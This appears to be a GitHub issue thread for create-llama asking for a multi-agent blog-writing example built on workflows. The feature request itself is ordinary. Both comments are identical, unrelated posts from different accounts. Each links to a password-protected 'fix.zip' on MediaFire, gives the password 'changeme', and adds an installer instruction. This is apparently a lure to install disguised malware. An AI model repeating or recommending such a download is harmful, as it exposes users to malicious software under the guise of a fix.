### ISSUE TITLE
Add multi-agents example using workflows

### ISSUE THREAD

**Issue by marcusschiesser** [run-llama/create-llama#250]
Use case: Writing a blog article

**Tasks**:
- [ ] Create the python backend of a workflow based multi-agents example
- [ ] Connect it with the existing chat UI
- [ ] Render the agent's thinking process grouped per agent (just showing the process, no interaction)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
